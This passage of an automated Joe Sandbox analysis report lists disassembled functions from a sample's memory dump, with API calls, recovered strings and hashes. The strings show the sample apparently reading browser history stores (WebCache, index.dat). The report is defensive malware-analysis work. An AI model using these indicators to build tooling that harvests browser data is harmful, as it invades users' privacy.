                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                            • String ID: /nosort$/sort
                                                                                                                                                                                                                                            • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                            • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                                                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                            • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                            • String ID: r!A
                                                                                                                                                                                                                                            • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ??2@
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1033339047-0
                                                                                                                                                                                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1979745280-0
                                                                                                                                                                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 839530781-0
                                                                                                                                                                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                            • String ID: *.*$index.dat
                                                                                                                                                                                                                                            • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1156039329-0
                                                                                                                                                                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                                                                                                                            • String ID: }A
                                                                                                                                                                                                                                            • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                            • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: freemallocmemcpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3056473165-0
                                                                                                                                                                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                                                                                                                            • String ID: /stext
                                                                                                                                                                                                                                            • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                            Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                                                                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                            Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                            • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
